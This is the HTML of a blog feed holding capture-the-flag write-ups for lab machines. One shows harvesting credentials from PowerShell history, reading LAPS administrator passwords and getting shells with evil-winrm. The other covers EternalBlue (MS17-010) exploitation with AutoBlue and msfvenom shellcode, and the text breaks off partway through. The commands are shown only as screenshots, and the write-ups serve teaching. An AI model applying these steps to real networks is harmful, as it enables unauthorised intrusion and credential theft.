url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7UlEQVR42m2QW26DMBREWUsJxkBiCPjBwxBSgpI27f6XMx37o1WkfhwNGpvxnZtoNcERW/WwymAYHxjnJxy1szec9YbWbPzeoN0O1a5o7Y66uyLNLQ7SvZD45Yll/UZ1mpCXDvPlKwYO/hOduaFmQODYLAy7xPCqnmPYfyTnbkUgkxZ54SCognrgoeCLeTn8UQ0QbJKVpOghojf+Iugn/XiHZjXNSqqZIWkGGlYy/R2V8pC8XBynqGFay3/c9Ii1Jf3i5CMhNBn9B2y/w3I/TdiPfo/BQQ29EPiWaaTCRDJOLTlpwRVlbJLm5qXyD3Janyxyg1+yAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list domain admins" title="" src="/static/281e9b30a83e91c2994ac44b94ca7524/50637/list-domain-admins.png" srcset="/static/281e9b30a83e91c2994ac44b94ca7524/dda05/list-domain-admins.png 158w, /static/281e9b30a83e91c2994ac44b94ca7524/679a3/list-domain-admins.png 315w, /static/281e9b30a83e91c2994ac44b94ca7524/50637/list-domain-admins.png 630w, /static/281e9b30a83e91c2994ac44b94ca7524/80335/list-domain-admins.png 652w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I checked <code class="language-text">ConsoleHost_history.txt</code> which is located in <code class="language-text">$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\</code> to see if it had anything interesting. <code class="language-text">ConsoleHost_history.txt</code> in PowerShell is similar to <code class="language-text">.bash_history</code> in Linux in that it's used to record command-line history on the machine. In this case, it contained credentials for <code class="language-text">svc_deploy</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d0e21a68c54c5823362b96ca69d76261/f4d8b/console-host-history.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 49.36708860759494%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB0UlEQVR42l1SSXLbQAzkUyKR4r7vm7gMyciKrciV8iH//0inQcmJK4cuYDADoBsYzbMLhFaBxMkQJx2iTCHOFZJ8QVquSIplh/hRNiMtJLYiJiK5KzfEvHODGrqdQdOtEmE+w40HOGEPLzrDC8/weY7SGUEyEhPjA4J43GNhqhAQPuMBm/uM6XaF4ymBFrOr6dYwnQoGmUbphLzayELB8ho4QY+MZ2Foey1OTo2T2xDtw0qMMOjrTgMtSEcYdonDKSftnlLVjrRcoLOBzruQTbKnZGEurN3gzPsaB7PccbTIkCy1gMxSMsz9Clk27fMLKU2Yiy9FRGbMmcaZ2pl+zlEaSVzm7kYjbL+H1nVX9N0LmmZDS1+WYVKWTQmO31Km2G6HxZjItp6w/X++wOS9Ns4/0fZXpGQTxFwGl+JyKQ4hg9ZltlRwpH3MroHxnKMs9BMyNkMkN2Q3jDcs2y+o5R3q+weW6Ybf9G/nK/EDH+sdd1rFt2q+Yx7eMPEsC3wUq/5Cq9sLxvmGnSkTRias6zsuwytexjfM9QbFN2IrYi1mvHJhl+Ixa/1Lsb1gz8SGCXmpkPFRyj8pTeSzekyQ7R3I4ptZ0Oc2bdno0/+PnRT8A7urQspkDmJlAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ConsoleHost_history.txt" title="" src="/static/d0e21a68c54c5823362b96ca69d76261/50637/console-host-history.png" srcset="/static/d0e21a68c54c5823362b96ca69d76261/dda05/console-host-history.png 158w, /static/d0e21a68c54c5823362b96ca69d76261/679a3/console-host-history.png 315w, /static/d0e21a68c54c5823362b96ca69d76261/50637/console-host-history.png 630w, /static/d0e21a68c54c5823362b96ca69d76261/f4d8b/console-host-history.png 780w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used the credentials to get a shell as <code class="language-text">svc_deploy</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a639f7ec8745a4ad5bc6904b88e7f42/ca847/evil-winrm-svc_deploy.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABM0lEQVR42oWQ2W7DIBBF/S1RjFlsg8EL2MFLFilVVLX//zO3QxxF6kPVh6NZGe5MxswK1n4idw8ou2G9fGPevhDmB6Z4hx9WFMpDVAHOBFR1gNEB1oxQ5YiDJLjHQexkvIzg1QJRL8jlDCZGFLxHzjvkRQcpewg5gBNS/UbQR1x6FC9YGnjtLbbO4do7fHiLFO85izPlYuugqxam7mDrFk4n26EhWt0+sTr5HZTqkVUyopQnIqJWRLmQqhGlopyaqGkmhbQF9ezEZ5yQMtXmdz6RTc2IQLcZ6C6xCdAk/cB6HAuCpbXT+okBuUhrhSf5y+6+f9cyQQOEDHSTCZKOzMsTGKlipDZXC1i5kx4cafDO8CeZ1QuGZoNvZvhwg+1vqJsV2p1h3IXsBRXVjdvA5PDv0B9fINvOdbsk4gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm connection as svc_deploy" title="" src="/static/1a639f7ec8745a4ad5bc6904b88e7f42/50637/evil-winrm-svc_deploy.png" srcset="/static/1a639f7ec8745a4ad5bc6904b88e7f42/dda05/evil-winrm-svc_deploy.png 158w, /static/1a639f7ec8745a4ad5bc6904b88e7f42/679a3/evil-winrm-svc_deploy.png 315w, /static/1a639f7ec8745a4ad5bc6904b88e7f42/50637/evil-winrm-svc_deploy.png 630w, /static/1a639f7ec8745a4ad5bc6904b88e7f42/ca847/evil-winrm-svc_deploy.png 778w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Checking group membership for <code class="language-text">svc_deploy</code> showed that the user was a member of <code class="language-text">LAPS_Readers</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/55e27dc7db1ef6070bc2ad961a32fefa/7f23a/net-user-svc_deploy.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 54.43037974683544%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABm0lEQVR42n2S6XKCQBCE91lAkEMuYWUBOdUkJuaovP+7dHow5qhofnQttTAfPdOjymJEve6R+mvEaYMkn5Csedee0O/fkJcHhEmHKOsRpfyu2CHme9srYfvmLD5bbgY7MFDD4R3t9IooH+Hwwl5qaoOYAIH5UQM3qOY7y9UUzyVhnvkGUpaTwvJyqKY7oe6e0I4v/HMPxy8JMNDV3aezgY4H3hss6OQscwb+hIpLQlVe7nGRF8qfNFx+oM0Bq6Sd3S3DGt6q+QG8AaXUyJZHzmrcv8M0RwILAkt00wvn+Ihss0emd8h52svfwGtQVdZ32NCNFAswzkY6rZAV09z+LBY4v9zdBitTP6BqHpATkDKYgK1Jsc/TcouvkESLm9BvsBqY8MSWTX0PR4qY4oKnx7kFTNhbnef3d4bXpWImmTLdgG16sjZcDXEYMdmQoQgoiLcIqYvbf4FldT+7azjDbnhGrie4LKq4g5pLXDGMmGCBiuPLXt4ESiBbwmSObX9CtT1C0/Ez1+hYDJgSQmSm0Xbe01XacY0EeN3pB2pyWvZLylktAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net user svc_deploy" title="" src="/static/55e27dc7db1ef6070bc2ad961a32fefa/50637/net-user-svc_deploy.png" srcset="/static/55e27dc7db1ef6070bc2ad961a32fefa/dda05/net-user-svc_deploy.png 158w, /static/55e27dc7db1ef6070bc2ad961a32fefa/679a3/net-user-svc_deploy.png 315w, /static/55e27dc7db1ef6070bc2ad961a32fefa/50637/net-user-svc_deploy.png 630w, /static/55e27dc7db1ef6070bc2ad961a32fefa/7f23a/net-user-svc_deploy.png 779w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>LAPS (Local Administrator Password Solution) is used to manage local administrator passwords in an Active Directory environment. The main purpose of LAPS is to improve the security of local administrator passwords by generating a unique and complex password for the local administrator account on each computer at a configured frequency.</p> <p>Members of the <code class="language-text">LAPS_Readers</code> group have the ability to read the password of the local administrator which is stored in the <code class="language-text">ms-mcs-admpwd</code> property:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7a404e6f09ea090f0186aac1f9b2df8d/a7269/read-ms-mcs-admpwd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABIElEQVR42m2Ra26DMBCEuUqbEAMmAczDhoDNKyQkURW19z/LdO1Uiqr2x6e1197xjOwxP0ewEdizHHEswQ8d0SJOOsc+04hTjYj6B9HT3oAnGjy1fUN3ejrT2IuBegZe3a5ozR1FveCQ0UA+omguEGqBqM/gJBKmdqB3wkkxunuWbSDxviuxYRVVgkl4w/RAP3ygJkE/lDiT2K1ZMFczLlSnaoTJOjAa3oYKu6h2+LS2gi+Uw2v1HZWckVCUt62AUSes5FryGjkrUUYSBVcIeAMWH+H/uPot9sKblk+M8wNtd0VEItVxhZm/KPbqottatVcoeqTRN2Tl5OJalxv2j2BejuROQ+SDg1HsHcFoILSuIuXW1mEQP4no0/5Gfgp+A6tMwDSECCBiAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="read ms-mcs-admpwd" title="" src="/static/7a404e6f09ea090f0186aac1f9b2df8d/50637/read-ms-mcs-admpwd.png" srcset="/static/7a404e6f09ea090f0186aac1f9b2df8d/dda05/read-ms-mcs-admpwd.png 158w, /static/7a404e6f09ea090f0186aac1f9b2df8d/679a3/read-ms-mcs-admpwd.png 315w, /static/7a404e6f09ea090f0186aac1f9b2df8d/50637/read-ms-mcs-admpwd.png 630w, /static/7a404e6f09ea090f0186aac1f9b2df8d/a7269/read-ms-mcs-admpwd.png 740w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Shell as <code class="language-text">Administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d080210af03f6ad0ff5dc887d0c048d0/7f23a/evil-winrm-administrator.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 94.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAADBElEQVR42o1U247bNhTUpyTW/U6JFClZtry6eNdtWiRZpCjQ//+P6ZByNruLRdGHAUVZZzhnztBe1C6I+mcE5hvKfsP6219Ybz9w2r5hvv4Bc1yQVwZhOaAQA6pCoxI9Sj7XTY+kGvA563HIjIMXVQ+Ia0LMLJoQ5keEmcYh7XBIFBISpKVBVBi3ZqVGxgPSqudqCXv3m0WYk3A1CrPpsPYKt1FyldgGyXcE301aoqoV6kqh4drWLZqq5b6FrBtIwb2QUG3HTjS8vDijcJhQlReHvBi5P91xQUYk+RlxfkKSWYxI0iPS1K4D4kQTht2c4elmhBYjTxtxlCcSnuAnPYJ0R0h/wtQ4BCwMku6+7s9+rOBHLfyg5vdsOauOyGqeWlNZfUbIUwKqDagmoLKf8KnAJ8kOhUMs7+Cze8ehRA28qhzRUpUWJ0i9oDWPaLsVtVxQqxVCbxDdhkrOqNrpRaE7gB34bNnBEkcC3pGtXqnwixpw226MzN/Ynn7gsnzFZf2K+fEZD4yQUAuq5oJGbYiyI1X9JOxf1Pk2NnUkIf0GJq6hOyodf4cZb1RoFT3c15mROSHOBqrrHazPvwi1U+fTb89u8maij2dXlBGfAonPFqFysPtDaFs1d7wjJA6hoGpph0ISIimObpKlmJinE8lHVxxRVV7zwOrs9n6sfxG+Ucm2Qw6l1etLDCyRHYgentANj4jSnVBwOPp449VjHpnRMH1F+E6pZ8YnpMXA8I748uc/mNfvjnC5fmf7o1P0iW1PC+/29sxDGa172x8p9ezkonT3puufGJ3NtS3Ntscj2r0TVF7y2zA1b7x8T+wVnLKIFGTSQtQDi2ZHKDjdpluct1alxSF6PZiPib2SgWzjDiplfHgNlaFKqlHmCtVf3XAsmfXtrbqP4fkkq+UDDZ+cZwU9KjjV3QobB95VfnNgF0H8PwhbNSNiQciC0JKTSNG/hjfDemhJ7eRtGuJ8uMfmPwgFb0PCKxOxuKVvioUN3yl93YdFAqvYWlA206t/mo8J/wUYRFOPlX37jwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm administrator" title="" src="/static/d080210af03f6ad0ff5dc887d0c048d0/50637/evil-winrm-administrator.png" srcset="/static/d080210af03f6ad0ff5dc887d0c048d0/dda05/evil-winrm-administrator.png 158w, /static/d080210af03f6ad0ff5dc887d0c048d0/679a3/evil-winrm-administrator.png 315w, /static/d080210af03f6ad0ff5dc887d0c048d0/50637/evil-winrm-administrator.png 630w, /static/d080210af03f6ad0ff5dc887d0c048d0/7f23a/evil-winrm-administrator.png 779w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-blue/https://mgarrity.com/hack-the-box-blue/Thu, 16 Nov 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/100ad3135253678ab84da64681d73f45/3b67f/blue.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABB0lEQVR42p2SzUrDUBBGsxRcmJp/bVOsrTa5SQoGo6W6qTGCoCIuxC60SMG+gPoCbl279D18Cle+zvEmKLhoUuxiGD5m7uGbmavoDUFpuAJtXbBiClZlNtyK3p9Qygr5Y9UWOC3BVuzhbAaFngdVymE+3b0eJ5MB/fE56X0fT2rV8SuhM4H5mE47ZDgKMY5GGM/vLA2uyG572K0Qrf4fYO7OEmwnEbtnCerNK4efXyiXL+xfJHTiSLosH322w3qAveGRPmRo4zfMxw+WT5/IpkOsplfUF9ihoLMjSKfHxHfXpJMD6S6sdDf3yjV5GMvt0o48zKZfwHR3wW/zC9UbAbW14I+uBn4DNYABRyH2MjQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blue" title="" src="/static/100ad3135253678ab84da64681d73f45/50637/blue.png" srcset="/static/100ad3135253678ab84da64681d73f45/dda05/blue.png 158w, /static/100ad3135253678ab84da64681d73f45/679a3/blue.png 315w, /static/100ad3135253678ab84da64681d73f45/50637/blue.png 630w, /static/100ad3135253678ab84da64681d73f45/fddb0/blue.png 945w, /static/100ad3135253678ab84da64681d73f45/3b67f/blue.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Blue is a Windows machine running SMB. A scan with Nmap can reveal that the box is vulnerable to EternalBlue, an exploit that targets a flaw in the way SMBv1 handles packets which can be leveraged for remote code execution. Exploiting the EternalBlue vulnerability results in a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f13b7ba8e9d85d57bfcbdeeb690f4402/78bef/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 89.24050632911393%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAADC0lEQVR42m1UV3LqQBDUTWwTJARCOWckkLGNsz/e/S/Sr2fAqcofXRtK2zvd0yvDivdYle8w0xPW2Yju9g3D8QPT6R+S5g5uvMM6aLHc5DC3pWLB+Xyd/Qmj6J+QdydU4zOi6hZ5f0LDecnRTQY4UY/thfQ875V0Zqd/E7Y8nJQTquEJ7eGV4yOi4oAg38PPBmzCFrZX48aKcWVGuF7FSjazs8v4GyR8QcTDGeW1+xf00xu8ZKeyx9t3NHLR+ISkmuDFHWy3oPwUplNopda24lhg5VW6NrLmHu3wjIKETtghSEe40Q5+OmBLiR7lBukOXtRxn7L9Chs3h+0krL5RO0SFx+/lvNEf3ljJB0R6vXtCmO0xsxKdt5Tf04b93Qdiqria+7hZBmcsODfDH/KTi2RW11NqzcY0JEmKCfNVSvmv6Li/owX74zsiJuB6QQIrvYAkS65Nn/OQZyIigZGWt0oS5xO9PCAuJpUZF+x4fURGpOURYTphGw6M0UgrRn7TY2lHmEmTBCSdLX0YUXagfw/IqnuU7QNc+rCQCsyUB3LF3MqxsKUZ5RcWUpEtUcnPuGTTWHsNpT7Trxc0zKSQ+jEb4nckSngwI3KVOBfyC6SauWax+J1DN+zp4av61zFCef1A3CuCZMTabdhZ6fYIy6koT4gLXhD/IP0OueExGh0rFC9jeujzoBN0JGFMeFnAtRvusFyXvypUUlNIA46foIcuD5fiIY0XqQmbIb46fqv+ieS5dJSe3hAzkc89hX2xgqnQSqXLHkPcj68YmEeRXHWPKltGIZbqpEqpPMomPsNOLXC4b/NSa1uTKDs3iDA2bo1ukBw+siHS6ZM2RsiiiwVeNCipeGqxwyunxmrb8PnVMNcVCfOfhA3GwwdqEnXj81eDRPrZv54vIyFiXBMzM1H53+MZN0yEEvq8Pa/uzj4WRw15Xt/pnkgU6QG9FU9X7LKCVdqUKlh/jozfclPAyNmMKKU0epnytWT6KkbteEzZSSHrg74WmcuLsvmHcbxWL9FEBPLj4H/SKfEfauxHIn/lg+wAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/f13b7ba8e9d85d57bfcbdeeb690f4402/50637/nmap-scan.png" srcset="/static/f13b7ba8e9d85d57bfcbdeeb690f4402/dda05/nmap-scan.png 158w, /static/f13b7ba8e9d85d57bfcbdeeb690f4402/679a3/nmap-scan.png 315w, /static/f13b7ba8e9d85d57bfcbdeeb690f4402/50637/nmap-scan.png 630w, /static/f13b7ba8e9d85d57bfcbdeeb690f4402/78bef/nmap-scan.png 771w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notable open ports:</p> <ul> <li>135 (MSRPC)</li> <li>139, 445 (SMB)</li> </ul> <p>SMB allowed anonymous logon and I was able to list the shares using <code class="language-text">crackmapexec</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e7235ac327dfebdfcd1541235a321e45/41d0c/smb-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABGUlEQVR42l3P207CQBSFYV5EjBDowem502mnlJZSUCQREUyM0fd/jN+NmJh4sTI7c/HttUduvsUzB5R9Ia93dMORbnOkXD4RZQ1+WONIVLoiilqUb3D8HEeVuIEkspKFpGamKka+fUfFS6wATX+Qd0+ie8la8Fds+4wXt9h6z0kWHZsNed7hJc0VVYXAFb4Y88AymlVf3DmG1Ay0a2m22BEmnYAD/fYNbXfczguMsRhd4cYNpmzpbUkcafwgp4oUUzdl4hkBy08mF7AYaFYHjABB0hLn0nBz/gUN21JThCHjWcbs3uAFBVM532Sa8yrloUqk6QU0H39g/w8cTujq8QdclwVZrLmZxtgsJZV57BTSUP7TAhVdF3wD9Iijt434D6gAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="smb shares" title="" src="/static/e7235ac327dfebdfcd1541235a321e45/50637/smb-shares.png" srcset="/static/e7235ac327dfebdfcd1541235a321e45/dda05/smb-shares.png 158w, /static/e7235ac327dfebdfcd1541235a321e45/679a3/smb-shares.png 315w, /static/e7235ac327dfebdfcd1541235a321e45/50637/smb-shares.png 630w, /static/e7235ac327dfebdfcd1541235a321e45/41d0c/smb-shares.png 816w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I downloaded the readable shares, but <code class="language-text">Share</code> was empty and <code class="language-text">Users</code> didn't contain anything useful. However, the output above also showed that SMBv1 was enabled. Running SMBv1 on Windows 7 suggests a vulnerability to EternalBlue (MS17-010). I ran the <code class="language-text">smb-vuln-ms17-010.nse</code> script from <code class="language-text">nmap</code> to confirm:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8afc056e1a1aa7abc08eff84e08148a4/5a533/nmap-script-smb-vuln-ms17-010.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 57.59493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7ElEQVR42n2T15LiMBBF/SczBBsbWw5ITjhgwIQh7OxStfOw//8fd69kpooNw8OtbmTUfTrImlU/4ZQ3eMUe3eGG/vyB4/sv9KcPiHQNX3WI8+2gbAtHlJjM8y9lLbsr6u035O0JWfNm/LK7QJY7+HJlgkbZBkKtEaYbBDx7GjBYrHh5D7ncIyl6CNnBDkqM3BRjj6IdPWjsZc8DRsyqGExVB0PoxfWff/IL2ruMnz8PWK2vaPvvKFiyT1pNNZlnhmzsqgd790k4/gzwH1r28IJu9wMF6fL6CLHoELJfmly3Q1ChlmwRqRZ+XCFgFSFbIziwf0tWG1SrM5rNu5lsXh15qYHNjzZJbVI52mqR3iap7S4wdWLMxBLTv9pgOX6JkuVqwpoTXzJ4REJN+qmIJD6pAtLNuTYiaQZKtcKcyR8HZQXJioQXKE461qXKNe0GOtHIURjZC7zaCa3kb056lg2i/zoRPI8xdpJBMwnLDSqs+xvKRlOekC4PpLyY0rWK+sQKrnfxvDkbBVHJpAPVlO2YeJJBY1ieqLHIeqOMwVKSKr4aSal8R1+fvbGCo5GkUi59WurX05vB6MWP+Ip8tsJKWJ6m9KMWIm7hicGfM5G2ftjyew03bHiBa+XmbIHEyyRk7/Tq5MMq3fv4G3cbf2A5LCAGAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap script smb vuln ms17-010" title="" src="/static/8afc056e1a1aa7abc08eff84e08148a4/50637/nmap-script-smb-vuln-ms17-010.png" srcset="/static/8afc056e1a1aa7abc08eff84e08148a4/dda05/nmap-script-smb-vuln-ms17-010.png 158w, /static/8afc056e1a1aa7abc08eff84e08148a4/679a3/nmap-script-smb-vuln-ms17-010.png 315w, /static/8afc056e1a1aa7abc08eff84e08148a4/50637/nmap-script-smb-vuln-ms17-010.png 630w, /static/8afc056e1a1aa7abc08eff84e08148a4/5a533/nmap-script-smb-vuln-ms17-010.png 772w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So given that the machine was vulnerable, I cloned <a href="https://github.com/3ndG4me/AutoBlue-MS17-010" target="_blank">AutoBlue-MS17-010</a> from GitHub which provides a way to generate shellcode and exploit MS17-010 with or without Metasploit:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/418a1726f198fdff0c7b582bae308ec0/a8e7c/autoblue-ms17-010.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACbElEQVR42nVT6XKiQBj0UTYmCnKIIPdwiyKiGM2xW5X3f47enjGVo1L50TUzKD3d/TUTbb2Bllwwi19gRAPiosd++Itme8UwvmHTPWO5ruH4tVptr4Ll5lgStlvCcArcL+IPTPy0R9KcEJcnpMWgkFUjwnQPL2phOjmMZUaSgijVKp+ZK+5X1U/Coh6RkyArjyg3Z1TtFUXzyLO84IiEF6yjLTQzwb0W4m7mE4HCH7nOw++ENa0Jvlw0ZzS7J8izJE2LE0oSt/sXVJuL+l0qN51CwXZrBd3OvhOWkqg9o6iosD4hEr0izOtRqUyyg0LI5368gxu0SHJmLYhsoPUKUz36JDRchhyd4CRX2GGPIO04kCfIKMrNo7L9wBe+Wp1K0Kq0O9Wi7wofnAq6f0C+e0PWPiuS/fCPQ+mwDlsqYgusFLqCUJgbibpkRoIHnUT6F0KNOcy8HlO7w53BbFYF7fS0vme2RzX1vD4rpbcWHLFkdabz4J0soWVCi5X1Scgs5JRFfstKMJ8g7tRLcvIeFbp+wwFUWPkbOrhw6rsPhUYwwkpeYfk9m5BiEsUtRCYVHT6URSRcsG9Bd4GVd9DFDjOeHRZbEopy5L5572iupm2xlws7p2WHG59K8le4yagUCdqKWOy0vPUwrU7vk725MFnwKYckFcpufoKWZ1YOzeVXIa7wkkHd6tFaSJVrViSIt7ykoc0WXniDLLrJrCWJtP4Vk1VygCseYQcD7PVW/Vn2r5SDoCpBdYL9zJoRMXOW/ZSD+ZUw4M0pM5JI0h1iWg1YYJ9KVl6NBTO2sg6mzJI5LlgfGf79/CeZJPwP7UbO8E9NLIkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="AutoBlue-MS17-010" title="" src="/static/418a1726f198fdff0c7b582bae308ec0/50637/autoblue-ms17-010.png" srcset="/static/418a1726f198fdff0c7b582bae308ec0/dda05/autoblue-ms17-010.png 158w, /static/418a1726f198fdff0c7b582bae308ec0/679a3/autoblue-ms17-010.png 315w, /static/418a1726f198fdff0c7b582bae308ec0/50637/autoblue-ms17-010.png 630w, /static/418a1726f198fdff0c7b582bae308ec0/a8e7c/autoblue-ms17-010.png 648w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Within the <code class="language-text">shellcode</code> directory, the <code class="language-text">shell_prep.sh</code> script is used to generate the payloads using <code class="language-text">msfvenom</code>. Running it will prompt for various parameters, and then it will generate shellcode for both x64 and x86 architectures.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/32ef0609482846963717ecb3b63c7aa7/b5c22/shell_prep.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 98.10126582278481%; position: relative; bottom: 0; left: 0; background-image: 